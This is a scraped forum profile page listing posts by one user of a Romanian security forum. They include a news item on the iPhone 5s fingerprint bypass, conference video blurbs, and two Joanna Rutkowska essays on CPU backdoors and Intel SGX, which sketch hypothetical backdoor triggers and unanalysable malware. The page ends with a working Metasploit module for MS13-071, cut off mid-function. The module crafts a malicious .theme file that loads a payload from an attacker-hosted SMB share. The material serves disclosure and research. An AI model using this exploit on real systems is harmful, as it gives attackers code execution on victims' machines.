-
Posts
18715 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
Off-By-One Exploitation Tutorial
Nytro replied to Nytro's topic in Reverse engineering & exploit development
E tot un (stack based in tutorial) buffer overflow, dar la care, din cauza unei mici erori de logica, ai posibilitatea de a depasi buffer-ul doar cu un singur octet. -
Hackers claim first iPhone 5s fingerprint reader bypass; bounty founder awaiting verification Summary: One hacker group claims to have bypassed the Apple iPhone 5s fingerprint reader. ZDNet spoke to the founder of a bypass-seeking bounty on how the alleged hack will be verified. By Zack Whittaker for Zero Day | September 22, 2013 iPhone 5s' fingerprint reader, dubbed "Touch ID." (Image: Apple) Hackers from the Germany-based Chaos Computer Club (CCC) claim to have bypassed the fingerprint reader in Apple's iPhone 5s, dubbed "Touch ID," just two days after the smartphone first went on sale. In a statement on its website, the CCC confirmed that the bypass had taken place, adding: "A fingerprint of the phone user, photographed from a glass surface, was enough to create a fake finger that could unlock an iPhone 5s secured with Touch ID." The shows one user enrolling their finger, while later accessing the device using a different finger with a high-resolution latex or wood glue cast. The group detailed in a blog post how it accessed the device using a fake print by photographing a fingerprint and converting it. "Apple's sensor has just a higher resolution compared to the sensors so far," said CCC spokesperson Frank Rieger on the group's website. "So we only needed to ramp up the resolution of our fake." The Chaos Computer Club is one of the longest-running hacking groups in the world. The CCC produces the world's oldest hacking conference, and this year will celebrate its 30th gathering ("30C3") in Hamburg, Germany, in December. Bounty on deck, pending confirmation Nick Depetrillo, who spoke to ZDNet on the phone on Sunday, explained how he set up a fingerprint reader bypass bounty as "putting my money where my mouth is." He submitting $100 of his own money into the crowdsourced pot. Working in conjunction with cybersecurity expert Robert Graham, who added $500 out of his own pocket to the mix, the two set up the website istouchidhackedyet.com, which catalogs those who pledge money to cracking the iPhone 5s' security feature. The website has been updated with a "Maybe!" message, confirming that a submission has been made by the hacker group, but noted that verification is still pending. To win the bounty, security researchers must video the lifting of a print, "like from a beer mug," and show it unlocking the phone, the website states. Describing the collective bounty as an "honor system," Depetrillo's website has cataloged thousands of dollars in cash (and hundreds of dollars escrowed by independent law firm CipherLaw), numerous bottles of liquor, a book of erotica, and even an iPhone 5c. But according to ZDNet's Violet Blue, who covered this story earlier in September, some are exploiting the high-profile bounty in a bid to generate press attention. One venture capitalist, who was understood to have contributed $10,000 to the bounty — though they declined to add it to a secure escrow account — reportedly misrepresented the project and spoke for the crowdsourced project "at every press opportunity." Many major news outlets as a result mistakenly attributed the project to the venture capitalist and not Depetrillo and Graham. Review and judging process Depetrillo explained that he, along with Graham, will review and judge the verification process. "The Chaos Computer Club [or any other submitter] will need to show us a complete video, documentation, and walkthrough lifting the print, re-creating the print, and having one human enrol their finger and another human somehow unlock that phone using the first person's print," he said. Depetrillo confirmed that there have been no other submissions yet, but noted that he has a "lot of respect for the CCC." He told ZDNet that he was "not surprised" when the hacker group appeared to be the first to submit a possible solution. "When we get complete documentation, we will review it and post our own technical justifications why we think this is a winning solution," he added. "If we clearly see and understand this is a sufficient and satisfactory winning solution, we will declare them the winner. "We want to convince everybody, not just ourselves, so that others could accept it as such. And everyone is free to debate it — and disagree with it. But if we believe there is a winner, we will hand over our promised money." Depetrillo said this is a one-time bounty on his part, but noted that others are welcome to start their own crowdsourced efforts for any additional hacks or bypasses. "But I look forward to sending my $100 to the winner," he said. Sursa: Hackers claim first iPhone 5s fingerprint reader bypass; bounty founder awaiting verification | ZDNet
-
Installing And Using Kali Linux, Metasploit, Nmap And More On Android Description: Installing and using Kali Linux, Metasploit, nmap and more on android danielhaake.de twitter.com/3lL060 youtube.com/user/3lL060 facebook.com/arniskinamutay external Link: Kali Linux on Android using Linux Deploy | Kali Linux Sursa: Installing And Using Kali Linux, Metasploit, Nmap And More On Android
-
Blackhat Us 2013 - Karsten Nohl - Rooting Sim Cards Description: SIM cards are among the most widely-deployed computing platforms with over 7 billion cards in active use. Little is known about their security beyond manufacturer claims. Besides SIM cards’ main purpose of identifying subscribers, most of them provide programmable Java runtimes. Based on this flexibility, SIM cards are poised to become an easily extensible trust anchor for otherwise untrusted smartphones, embedded devices, and cars. The protection pretense of SIM cards is based on the understanding that they have never been exploited. This talk ends this myth of unbreakable SIM cards and illustrates that the cards -- like any other computing system -- are plagued by implementation and configuration bugs. For More Information please visit : - https://www.blackhat.com/us-13/ Sursa: Blackhat Us 2013 - Karsten Nohl - Rooting Sim Cards
-
[h=3]More Thoughts on CPU backdoors[/h] I've recently exchanged a few emails with Loic Duflot about CPU-based backdoors. It turned out that he recently wrote a paper about hypothetical CPU-backdoors and also implemented some proof-of-concept ones using QEMU (for he doesn't happen to own a private CPU production line). The paper can be bought here. (Loic is an academic, and so he must follow some of the strange customs in the academic world, one of them being that papers are not freely published, but rather being sold on a publisher website… Heck, even we, the ultimately commercialized researchers, still publish our papers and code for free). Let me stress that what Loic writes about in the paper are only hypothetical backdoors, i.e. no actual backdoors have been found on any real CPU (ever, AFAIK!). What he does is he considers how Intel or AMD could implement a backdoor, and then he simulate this process by using QEMU and implementing those backdoors inside QEMU. Loic also focuses on local privilege escalation backdoors only. You should however not underestimate a good local privilege escalation — such things could be used to break out of any virtual machine, like VMWare, or potentially even out of a software VMs like e.g. Java VM. The backdoors Loic considers are somewhat similar in principle to the simple pseudo-code one-liner backdoor I used in my previous post about hardware backdoors, only more complicated in the actual implementation, as he took care about a few important details, that I naturally didn't concern. (BTW, the main message of my previous post about was how cool technology this VT-d is, being able to prevent PCI-based backdoors, and not about how doomed we are because of Intel- or AMD-induced potential backdoors). Some people believe that processor backdoors do not exist in reality, because if they did, the competing CPU makers would be able to find them in each others' products, and later would likely cause a "leak" to the public about such backdoors (think: Black PR). Here people make an assumption that AMD or Intel is technically capable of reversing each others processors, which seems to be a natural consequence of them being able to produce them. I don't think I fully agree with such an assumption though. Just the fact that you are capable of designing and producing a CPU, doesn't mean you can also reverse engineer it. Just the fact that Adobe can write a few hundred megabyte application, doesn't mean they are automatically capable of also reverse engineering similar applications of that size. Even if we assumed that it is technically feasible to use some electron microscope to scan and map all the electronic elements from the processor, there is still a problem of interpreting of how all those hundreds of millions of transistors actually work. Anyway, a few more thoughts about properties of a hypothetical backdoors that Intel or AMD might use (be using). First, I think that in such a backdoor scenario everything besides the "trigger" would be encrypted. The trigger is something that you must execute first, in order to activate the backdoor (e.g. the CMP instruction with particular, i.e. magic, values of some registers, say EAX, EBX, ECX, EDX). Only then the backdoor gets activated and e.g. the processor auto-magically escalates into Ring 0. Loic considers this in more detail in his paper. So, my point is that all the attacker's code that executes afterwards, think of it as of a shellcode for the backdoor, that is specific for the OS, is fetched by the processor in an encrypted form and decrypted only internally inside the CPU. That should be trivial to implement, while at the same time should complicate any potential forensic analysis afterwards — it would be highly non-trivial to understand what the backdoor actually have done. Another crucial thing for a processor backdoor, I think, should be some sort of an anti-reply attack protection. Normally, if a smart admin had been recording all the network traffic, and also all the executables that ever got executed on the host, chances are that he or she would catch the triggering code and the shellcode (which might be encrypted, but still). So, no matter how subtle the trigger is, it is still quite possible that a curious admin will eventually find out that some tetris.exe somehow managed to breakout of a hardware VM and did something strange, e.g. installed a rootkit in a hypervisor (or some Java code somehow was able to send over all our DOCX files from our home directory). Eventually the curious admin will find out that strange CPU instruction (the trigger) after which all the strange things had happened. Now, if the admin was able to take this code and replicate it, post it to Daily Dave, then, assuming his message would pass through the Moderator (Hi Dave), he would effectively compromise the processor vendor's reputation. An anti-replay mechanism could ideally be some sort of a challenge-response protocol used in a trigger. So, instead having you always to put 0xdeadbeaf, 0xbabecafe, and 0x41414141 into EAX, EBX and EDX and execute some magic instruction (say CMP), you would have to put a magic that is a result of some crypto operation, taking current date and magic key as input: Magic = MAGIC (Date, IntelSecretKey). The obvious problem is how the processor can obtain current date? It would have to talk to the south-bridge at best, which is 1) nontrivial, and 2) observable on a bus, and 3) spoof'able. A much better idea would be to equip a processor with some sort of an eeprom memory, say big enough to hold one 64-bit or maybe 128-bit value. Each processor would get a different value flashed there when leaving the factory. Now, in order to trigger the backdoor, the processor vendor (or backdoor operator, think: NSA) would have to do the following: 1) First execute some code that would read this unique value stored in eeprom for the particular target processor, and send this back to them, 2) Now, they could generate the actual magic for the trigger: Magic = MAGIC (UniqeValueInEeprom, IntelSecretKey) 3) ...and send the actual code to execute the backdoor and shellcode, with the correct trigger embedded, based on the magic value. Now, the point is that the processor will automatically increment the unique number stored in the eeprom, so the same backdoor-exploiting code would not work twice for the same processor (while at the same time it would be easy for NSA to send another exploit, as they know what the next value in the eeprom should be). Also, such a customized exploit would not work on any other CPU, as the assumption was that each CPU gets a different value at the factory, so again it would not be possible to replicate the attack and proved that the particular code has ever done something wrong. So, the moment I learn that processors have built-in eeprom memory, I will start thinking seriously there are backdoors out there One thing that bothers me with all those divagations about hypothetical backdoors in processors is that I find them pretty useless in at the end of the day. After all, by talking about those backdoors, and how they might be created, we do not make it any easier to protect against them, as there simply is no possible defense here. Also this doesn't make it any easier for us to build such backdoors (if we wanted to become the bad guys for a change). It might only be of an interest to Intel or AMD, or whatever else processor maker, but I somewhat feel they have already spent much more time thinking about it, and chances are they probably can only laugh at what we are saying here, seeing how unsophisticated our proposed backdoors are. So, my Dear Reader, I think you've been just wasting time reading this post Sorry for tricking you into this and I hope to write something more practical next time Posted by Joanna Rutkowska at Tuesday, June 02, 2009 Sursa: The Invisible Things Lab's blog: More Thoughts on CPU backdoors
-
[h=3]Thoughts on Intel's upcoming Software Guard Extensions (Part 2)[/h] In the first part of this article published a few weeks ago, I have discussed the basics of Intel SGX technology, and also discussed challenges with using SGX for securing desktop systems, specifically focusing on the problem of trusted input and output. In this part we will look at some other aspects of Intel SGX, and we will start with a discussion of how it could be used to create a truly irreversible software. SGX Blackboxing – Apps and malware that cannot be reverse engineered? A nice feature of Intel SGX is that the processor automatically encrypts the content of SGX-protected memory pages whenever it leaves the processor caches and is stored in DRAM. In other words the code and data used by SGX enclaves never leave the processor in plaintext. This feature, no doubt influenced by the DRM industry, might profoundly change our approach as to who controls our computers really. This is because it will now be easy to create an application, or malware for that matter, that just cannot be reversed engineered in any way. No more IDA, no more debuggers, not even kernel debuggers, could reveal the actual intentions of the EXE file we're about to run. Consider the following scenario, where a user downloads an executable, say blackpill.exe, which in fact logically consists of three parts: A 1st stage loader (SGX loader) which is unencrypted, and which task is to setup an SGX enclave, copy the rest of the code there, specifically the 2nd stage loader, and then start executing the 2nd stage loader... The 2nd stage loader, which starts executing within the enclave, performs remote attestation with an external server and, in case the remote attestation completes successfully, obtains a secret key from the remote server. This code is also delivered in plaintext too. Finally the encrypted blob which can only be decrypted using the key obtained by the 2nd stage loader from the remote server, and which contains the actual logic of the application (or malware). We can easily see that there is no way for the user to figure out what the code from the encrypted blob is going to do on her computer. This is because the key will be released by the remote server only if the 2nd stage loader can prove via remote attestation that it indeed executes within a protect SGX enclave and that it is the original unmodified loader code that the application's author created. Should one bit of this loader be modified, or should it be attempted to run outside of an SGX enclave, or within a somehow misconfigured SGX enclave, then the remote attestation would fail and the key will not be obtained. And once the key is obtained, it is available only within the SGX enclave. It cannot be found in DRAM or on the memory bus, even if the user had access to expensive DRAM emulators or bus sniffers. And the key cannot also be mishandled by the code that runs in the SGX enclave, because remote attestation also proved that the loader code has not been modified, and the author wrote the loader specifically not to mishandle the key in any way (e.g. not to write it out somewhere to unprotected memory, or store on the disk). Now, the loader uses the key to decrypt the payload, and this decrypted payload remains within secure enclave, never leaving it, just like the key. It's data never leaves the enclave either... One little catch is how the key is actually sent to the SGX-protected enclave so that it could not be spoofed in the middle? Of course it must be encrypted, but to which key? Well, we can have our 2nd stage loader generate a new key pair and send the public key to the remote server – the server will then use this public key to send the actual decryption key encrypted with this loader's public key. This is almost good, except for the fact that this scheme is not immune to a classic main in the middle attack. The solution to this is easy, though – if I understand correctly the description of the new Quoting and Sealing operations performed by the Quoting Enclave – we can include the generated public key hash as part of the data that will be signed and put into the Quote message, so the remote sever can be assured also that the public key originates from the actual code running in the SGX enclave and not from Mallory somewhere in the middle. So, what does the application really do? Does it do exactly what has been advertised by its author? Or does it also “accidentally” sniffs some system memory or even reads out disk sectors and sends the gathered data to a remote server, encrypted, of course? We cannot know this. And that's quite worrying, I think. One might say that we do accept all the proprietary software blindly anyway – after all who fires up IDA to review MS Office before use? Or MS Windows? Or any other application? Probably very few people indeed. But the point is: this could be done, and actually some brave souls do that. This could be done even if the author used some advanced form of obfuscation. Can be done, even if taking lots of time. Now, with Intel SGX it suddenly cannot be done anymore. That's quite a revolution, complete change of the rules. We're no longer masters of our little universe – the computer system – and now somebody else is. Unless there was a way for “Certified Antivirus companies” to get around SGX protection.... (see below for more discussion on this). ...And some good applications of SGX The SGX blackboxing has, however, some good usages too, beyond protecting the Hollywood productions, and making malware un-analyzable... One particularly attractive possibility is the “trusted cloud” where VMs offered to users could not be eavesdropped or tampered by the cloud provider admins. I wrote about such possibility two years ago, but with Intel SGX this could be done much, much better. This will, of course, require a specially written hypervisor which would be setting up SGX containers for each of the VM, and then the VM could authenticate to the user and prove, via remote attestation, that it is executing inside a protected and properly set SGX enclave. Note how this time we do not require the hypervisor to authenticate to the users – we just don't care, if our code correctly attests that it is in a correct SGX, it's all fine. Suddenly Google could no longer collect and process your calendar, email, documents, and medial records! Or how about a tor node that could prove to users that it is not backdoored by its own admin and does not keep a log of how connections were routed? Or a safe bitcoin web-based wallet? It's hard to overestimate how good such a technology might be for bringing privacy to the wide society of users... Assuming, of course, there was no backdoor for the NSA to get around the SGX protection and ruin this all goodness...(see below for more discussion on this). New OS and VMM architectures In the paragraph above I mentioned that we will need specially written hypervisors (VMMs) that will be making use of SGX in order to protect the user's VMs against themselves (i.e. against the hypervisor). We could go further and put other components of a VMM into protected SGX enclaves, things that we currently, in Qubes OS, keep in separate Service VMs, such as networking stacks, USB stacks, etc. Remember that Intel SGX provides convenient mechanism to build inter-enclave secure communication channels. We could also take the “GUI domain” (currently this is just Dom0 in Qubes OS) and move it into a separate SGX enclave. If only Intel came up with solid protected input and output technologies that would work well with SGX, then this would suddenly make whole lots of sense (unlike currently where it is very challenging). What we win this way is that no longer a bug in the hypervisor should be critical, as it would be now a long way for the attacker who compromised the hypervisor to steal any real secret of the user, because there are no secrets in the hypervisor itself. In this setup the two most critical enclaves are: 1) the GUI enclave, of course, and 2) the admin enclave, although it is thinkable that the latter could be made reasonably deprivileged in that it might only be allowed to create/remove VMs, setup networking and other policies for them, but no longer be able to read and write memory of the VMs (Anti Snowden Protection, ASP?). And... why use hypervisors? Why not use the same approach to compartmentalize ordinary operating systems? Well, this could be done, of course, but it would require considerable rewrite of the systems, essentially turning them into microkernels (except for the fact that the microkernel would no longer need to be trusted), as well as the applications and drivers, and we know that this will never happen. Again, let me repeat one more time: the whole point of using virtualization for security is that it wraps up all the huge APIs of an ordinary OS, like Win32 or POSIX, or OSX, into a virtual machine that itself requires orders of magnitude simpler interface to/from the outside world (especially true for paravirtualized VMs), and all this without the need to rewrite the applications. Trusting Intel – Next Generation of Backdooring? We have seen that SGX offers a number of attractive functionality that could potentially make our digital systems more secure and 3rd party servers more trusted. But does it really? The obvious question, especially in the light of recent revelations about NSA backdooring everything and the kitchen sink, is whether Intel will have backdoors allowing “privileged entities” to bypass SGX protections? Traditional CPU backdooring Of course they could, no question about it. But one can say that Intel (as well as AMD) might have been having backdoors in their processors for a long time, not necessarily in anything related to SGX, TPM, TXT, AMT, etc. Intel could have built backdoors into simple MOV or ADD instructions, in such a way that they would automatically disable ring/page protections whenever executed with some magic arguments. I wrote more about this many years ago. The problem with those “traditional” backdoors is that Intel (or a certain agency) could be caught using it, and this might have catastrophic consequences for Intel. Just imagine somebody discovered (during a forensic analysis of an incident) that doing: MOV eax, $deadbeef MOV ebx, $babecafe ADD eax, ebx ...causes ring elevation for the next 1000 cycles. All the processors affected would suddenly became equivalents of the old 8086 and would have to be replaced. Quite a marketing nightmare I think, no? Next-generation CPU backdooring But as more and more crypto and security mechanisms got delegated from software to the processor, the more likely it becomes for Intel (or AMD) to insert really “plausibly deniable” backdoors into processors. Consider e.g. the recent paper on how to plant a backdoor into the Intel's Ivy Bridge's random number generator (usable via the new RDRAND instruction). The backdoor reduces the actual entropy of the generator making it feasible to later brute-force any crypto which uses keys generated via the weakened generator. The paper goes into great lengths describing how this backdoor could be injected by a malicious foundry (e.g. one in China), behind the Intel's back, which is achieved by implementing the backdoor entirely below the HDL level. The paper takes a “classic” view on the threat model with Good Americans (Intel engineers) and the Bad Chinese (foundry operators/employees). Nevertheless, it should be obvious that Intel could have planted such a backdoor without any effort or challenge described in the paper, because they could do so at any level, not necessarily below HDL. But backdooring an RNG is still something that leaves traces. Even though the backdoored processor can apparently pass all external “randomness” testes, such as the NIST testsuite, they still might be caught. Perhaps because somebody will buy 1000 processors and will run them for a year and will note down all the numbers generated and then conclude that the distribution is quite not right. Or something like that. Or perhaps because somebody will reverse-engineer the processor and specifically the RNG circuitry and notice some gates are shorted to GND. Or perhaps because somebody at this “Bad Chinese” foundry will notice that. Let's now get back to Intel SGX -- what is the actual Root of Trust for this technology? Of course, the processor, just like for the old ring3/ring0 separation. But for SGX there is additional Root of Trust which is used for remote attestation, and this is the private key(s) used for signing the Quote Messages. If the signing private key somehow got into the hands of an adversary, the remote attestation breaks down completely. Suddenly the “SGX Blackboxed” apps and malware can readily be decrypted, disassembled and reverse engineered, because the adversary can now emulate their execution step by step under a debugger and still pass the remote attestation. We might say this is good, as we don't want irreversible malware and apps. But then, suddenly, we also loose our attractive “trusted cloud” too – now there is nothing that could stop the adversary, who has the private signing key, to run our trusted VM outside of SGX, yet still reporting to us that it is SGX-protected. And so, while we believe that our trusted VM should be trusted and unsniffable, and while we devote all our deepest secrets to it, the adversary can read them all like on a plate. And the worst thing is – even if somebody took such a processor, disassembled it into pieces, analyzed transitor-by-transitor, recreated HDL, analyzed it all, then still it all would look good. Because the backdoor is... the leaked private key that is now also in the hands of the adversary, and there is no way to prove it by looking at the processor alone. As I understand, the whole idea of having a separate TPM chip, was exactly to make such backdoor-by-leaking-keys more difficult, because, while we're all forced to use Intel or AMD processors today, it is possible that e.g. every country can produce their own TPM, as it's million times less complex than a modern processor. So, perhaps Russia could use their own TPMs, which they might be reasonably sure they use private keys which have not be handed over to the NSA. However, as I mentioned in the first part of this article, sadly, this scheme doesn't work that well. The processor can still cheat the external TPM module. For example, in case of an Intel TXT and TPM – the processor can produce incorrect PCR values in response to certain trigger – in that case it no longer matters that the TPM is trusted and keys not leaked, because the TPM will sign wrong values. On the other hand we go back now to using “traditional” backdoors in the processors, whose main disadvantage is that people might got cought using them (e.g. somebody analyzed an exploit which turns out to be triggering correct Quote message despite incorrect PCRs). So, perhaps, the idea of separate TPM actually does make some sense after all? What about just accidental bugs in Intel products? Conspiracy theories aside, what about accidental bugs? What are the chances of SGX being really foolproof, at least against those unlucky adversaries who didn't get access to the private signing keys? The Intel's processor have become quite a complex beasts these days. And if you also thrown in the Memory Controller Hub, it's unimaginably complex beast. Let's take a quick tour back discussing some spectacular attacks against Intel “hardware” security mechanisms. I wrote “hardware” in quotation marks, because really most of these technologies is software, like most of the things in electronics these days. Nevertheless the “hardware enforced security” does have a special appeal to lots of people, often creating an impression that these must be some ultimate unbreakable technologies.... I think it all started with our exploit against Intel Q35 chipset (slides 15+) demonstrated back in 2008 which was the first attack allowing to compromise, otherwise hardware-protected, SMM memory on Intel platforms (some other attacks against SMM shown before assumed the SMM was not protected, which was the case on many older platforms). This was then shortly followed by another paper from us about attacking Intel Trusted Execution Technology (TXT), which found out and exploited a fact that TXT-loaded code was not protected against code running in the SMM mode. We used our previous attack on Q35 against SMM, as well as found a couple of new ones, in order to compromise SMM, plant a backdoor there, and then compromise TXT-loaded code from there. The issue highlighted in the paper has never really been correctly patched. Intel has spent years developing something they called STM, which was supposed to be a thin hypervisor for SMM code sandboxing. I don't know if the Intel STM specification has eventually been made public, and how many bugs it might be introducing on systems using it, or how much inaccurate it might be. In the following years we presented two more devastating attacks against Intel TXT (none of which depending on compromised SMM): one which exploited a subtle bug in the processor SINIT module allowing to misconfigure VT-d protections for TXT-loaded code, and another one exploiting a classic buffer overflow bug also in the processor's SINIT module, allowing this time not only to fully bypass TXT, but also fully bypass Intel Launch Control Policy and hijack SMM (several years after our original papers on attacking SMM the old bugs got patched and so this was also attractive as yet another way to compromise SMM for whatever other reason). Invisible Things Lab has also presented first, and as far as I'm aware still the only one, attack on Intel BIOS that allowed to reflash the BIOS despite Intel's strong “hardware” protection mechanism to allow only digitally signed code to be flashed. We also found out about secret processor in the chipset used for execution of Intel AMT code and we found a way to inject our custom code into this special AMT environment and have it executed in parallel with the main system, unconstrained by any other entity. This is quite a list of Intel significant security failures, which I think gives something to think about. At the very least that just because something is “hardware enforced” or “hardware protected” doesn't mean it is foolproof against software exploits. Because, it should be clearly said, all our exploits mentioned above were pure software attacks. But, to be fair, we have never been able to break Intel core memory protection (ring separation, page protection) or Intel VT-x. Rafal Wojtczuk has probably came closest with his SYSRET attack in an attempt to break the ring separation, but ultimately the Intel's excuse was that the problem was on the side of the OS developers who didn't notice subtle differences in the behavior of SYSRET between AMD and Intel processors, and didn't make their kernel code defensive enough against Intel processor's odd behavior. We have also demonstrated rather impressive attacks bypassing Intel VT-d, but, again, to be fair, we should mention that the attacks were possible only on those platforms which Intel didn't equip with so called Interrupt Remapping hardware, and that Intel knew that such hardware was indeed needed and was planning it a few years before our attacks were published. So, is Intel SGX gonna be as insecure as Intel TXT, or as secure as Intel VT-x....? The bottom line Intel SGX promises some incredible functionality – to create protected execution environments (called enclaves) within untrusted (compromised) Operating System. However, for SGX to be of any use on a client OS, it is important that we also have technologies to implement trusted output and input from/to the SGX enclave. Intel currently provides little details about the former and openly admits it doesn't have the later. Still, even without trusted input and output technologies, SGX might be very useful in bringing trust to the cloud, by allowing users to create trusted VMs inside untrusted provider infrastructure. However, at the same time, it could allow to create applications and malware that could not be reversed engineered. It's quote ironic that those two applications (trusted cloud and irreversible malware) are mutually bound together, so that if one wanted to add a backdoor to allow A/V industry to be able to analyze SGX-protected malware, then this very same backdoor could be used to weaken the guarantees of the trustworthiness of the user VMs in the cloud. Finally, a problem that is hard to ignore today, in the post-Snowden world, is the ease of backdooring this technology by Intel itself. In fact Intel doesn't need to add anything to their processors – all they need to do is to give away the private signing keys used by SGX for remote attestation. This makes for a perfectly deniable backdoor – nobody could catch Intel on this, even if the processor was analyzed transistor-by-transistor, HDL line-by-line. As a system architect I would love to have Intel SGX, and I would love to believe it is secure. It would allow to further decompose Qubes OS, specifically get rid of the hypervisor from the TCB, and probably even more. Special thanks to Oded Horowitz for turning my attention towards Intel SGX. Posted by Joanna Rutkowska at Monday, September 23, 2013 Sursa: The Invisible Things Lab's blog: Thoughts on Intel's upcoming Software Guard Extensions (Part 2)
-
Eu am asta: https://www.microsoft.com/learning/en-us/exam.aspx?id=70-660&locale=en-us Bine, nu am platit nimic pentru ea, dar oricum costa cam 50 de dolari (pentru studenti) ceea ce nu cred ca e mult. Daca vrei sa dai o certificare Microsoft, vorbeste cu cei de la MSP (Microsoft Student Partners) din facultate.
-
MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution Authored by Eduardo Prado, juan vazquez | Site metasploit.com This Metasploit module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the "Screen Saver" tab is viewed. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE include Msf::Exploit::Remote::SMBServer def initialize(info={}) super(update_info(info, 'Name' => "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution", 'Description' => %q{ This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the "Screen Saver" tab is viewed. }, 'License' => MSF_LICENSE, 'Author' => [ 'Eduardo Prado', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ ['CVE', '2013-0810'], ['OSVDB', '97136'], ['MSB', 'MS13-071'], ['BID', '62176'] ], 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'DefaultOptions' => { 'DisablePayloadHandler' => 'false' }, 'Platform' => 'win', 'Targets' => [ ['Windows XP SP3 / Windows 2003 SP2', {}], ], 'Privileged' => false, 'DisclosureDate' => "Sep 10 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The theme file', 'msf.theme']), OptString.new('UNCPATH', [ false, 'Override the UNC path to use (Ex: \\\\192.168.1.1\\share\\exploit.scr)' ]) ], self.class) end def exploit if (datastore['UNCPATH']) @unc = datastore['UNCPATH'] print_status("Remember to share the malicious EXE payload as #{@unc}") else print_status("Generating our malicious executable...") @exe = generate_payload_exe my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] @share = rand_text_alpha(5 + rand(5)) @scr_file = "#{rand_text_alpha(5 + rand(5))}.scr" @hi, @lo = UTILS.time_unix_to_smb(Time.now.to_i) @unc = "\\\\#{my_host}\\#{@share}\\#{@scr_file}" end print_status("Creating '#{datastore['FILENAME']}' file ...") # Default Windows XP / 2003 theme modified theme = <<-EOF ; Copyright © Microsoft Corp. 1995-2001 [Theme] DisplayName=@themeui.dll,-2016 ; My Computer [CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\DefaultIcon] DefaultValue=%WinDir%explorer.exe,0 ; My Documents [CLSID\\{450D8FBA-AD25-11D0-98A8-0800361B1103}\\DefaultIcon] DefaultValue=%WinDir%SYSTEM32\\mydocs.dll,0 ; My Network Places [CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\DefaultIcon] DefaultValue=%WinDir%SYSTEM32\\shell32.dll,17 ; Recycle Bin [CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\DefaultIcon] full=%WinDir%SYSTEM32\\shell32.dll,32 empty=%WinDir%SYSTEM32\\shell32.dll,31 [Control Panel\\Desktop] Wallpaper= TileWallpaper=0 WallpaperStyle=2 Pattern= ScreenSaveActive=0 [boot] SCRNSAVE.EXE=#{@unc} [MasterThemeSelector] MTSM=DABJDKT EOF file_create(theme) print_good("Let your victim open #{datastore['FILENAME']}") if not datastore['UNCPATH'] print_status("Ready to deliver your payload on #{@unc}") super end end # TODO: these smb_* methods should be moved up to the SMBServer mixin # development and test on progress def smb_cmd_dispatch(cmd, c, buff) smb = @state[c] vprint_status("Received command #{cmd} from #{smb[:name]}") pkt = CONST::SMB_BASE_PKT.make_struct pkt.from_s(buff) #Record the IDs smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID'] smb[:user_id] = pkt['Payload']['SMB'].v['UserID'] smb[:tree_id] = pkt['Payload']['SMB'].v['TreeID'] smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID'] case cmd when CONST::SMB_COM_NEGOTIATE smb_cmd_negotiate(c, buff) when CONST::SMB_COM_SESSION_SETUP_ANDX wordcount = pkt['Payload']['SMB'].v['WordCount'] if wordcount == 0x0D # It's the case for Share Security Mode sessions smb_cmd_session_setup(c, buff) else vprint_status("SMB Capture - #{smb[:ip]} Unknown SMB_COM_SESSION_SETUP_ANDX request type , ignoring... ") smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS) end when CONST::SMB_COM_TRANSACTION2 smb_cmd_trans(c, buff) when CONST::SMB_COM_NT_CREATE_ANDX smb_cmd_create(c, buff) when CONST::SMB_COM_READ_ANDX smb_cmd_read(c, buff) else vprint_status("SMB Capture - Ignoring request from #{smb[:name]} - #{smb[:ip]} (#{cmd})") smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS) end end def smb_cmd_negotiate(c, buff) pkt = CONST::SMB_NEG_PKT.make_struct pkt.from_s(buff) dialects = pkt['Payload'].v['Payload'].gsub(/\x00/, '').split(/\x02/).grep(/^\w+/) dialect = dialects.index("NT LM 0.12") || dialects.length-1 pkt = CONST::SMB_NEG_RES_NT_PKT.make_struct smb_set_defaults(c, pkt) time_hi, time_lo = UTILS.time_unix_to_smb(Time.now.to_i) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NEGOTIATE pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 17 pkt['Payload'].v['Dialect'] = dialect pkt['Payload'].v['SecurityMode'] = 2 # SHARE Security Mode pkt['Payload'].v['MaxMPX'] = 50 pkt['Payload'].v['MaxVCS'] = 1 pkt['Payload'].v['MaxBuff'] = 4356 pkt['Payload'].v['MaxRaw'] = 65536 pkt['Payload'].v['SystemTimeLow'] = time_lo pkt['Payload'].v['SystemTimeHigh'] = time_hi pkt['Payload'].v['ServerTimeZone'] = 0x0 pkt['Payload'].v['SessionKey'] = 0 pkt['Payload'].v['Capabilities'] = 0x80f3fd pkt['Payload'].v['KeyLength'] = 8 pkt['Payload'].v['Payload'] = Rex::Text.rand_text_hex(8) c.put(pkt.to_s) end def smb_cmd_session_setup(c, buff) pkt = CONST::SMB_SETUP_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 